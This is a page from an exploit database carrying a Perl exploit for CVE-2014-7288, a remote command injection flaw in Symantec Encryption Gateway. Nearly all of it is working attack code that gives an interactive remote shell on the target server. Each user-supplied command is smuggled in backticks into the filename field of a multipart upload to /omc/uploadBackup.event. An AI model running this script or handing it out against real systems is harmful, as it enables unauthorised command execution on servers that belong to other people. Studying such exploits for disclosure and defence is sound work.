Symantec Encryption Gateway Remote Command Injection



EKU-ID: 4926 CVE: 2014-7288 OSVDB-ID:
Author: Mohammad Reza Espargham Published: 2015-06-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl -w

use LWP::UserAgent;

# Vantage Point Security Advisory 2014-007
# Title: Symantec Encryption Management Server - Remote Command 
Injection Exploit
# CVE: CVE-2014-7288
# Vendor: Symantec
# Affected Product: Symantec Encryption Gateway
# Affected Versions: < 3.2.0 MP6
# Product Website: 
http://www.symantec.com/en/sg/gateway-email-encryption/
# Exploit Info : https://www.exploit-db.com/exploits/35949/
# Author: Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham

if (($#ARGV + 1) != 1)
{
     printf "   Usage: \n \t$0 <Target>\n";
     printf "\t$0 http://target.com/\n\n";
     exit(1);
}

chomp($target=$ARGV[0]);

if($target !~ /http:\/\//) { $target = "http://$target"; }

my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $url = "$target/omc/uploadBackup.event";

for(;;)
{
     print "shell : ";
     chomp($cmd=<STDIN>);
     my $response = $ua->post( $url,
         Content_Type => 'form-data',
         name => "file",
         Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ]
     );
     print "\n".$response->content;
}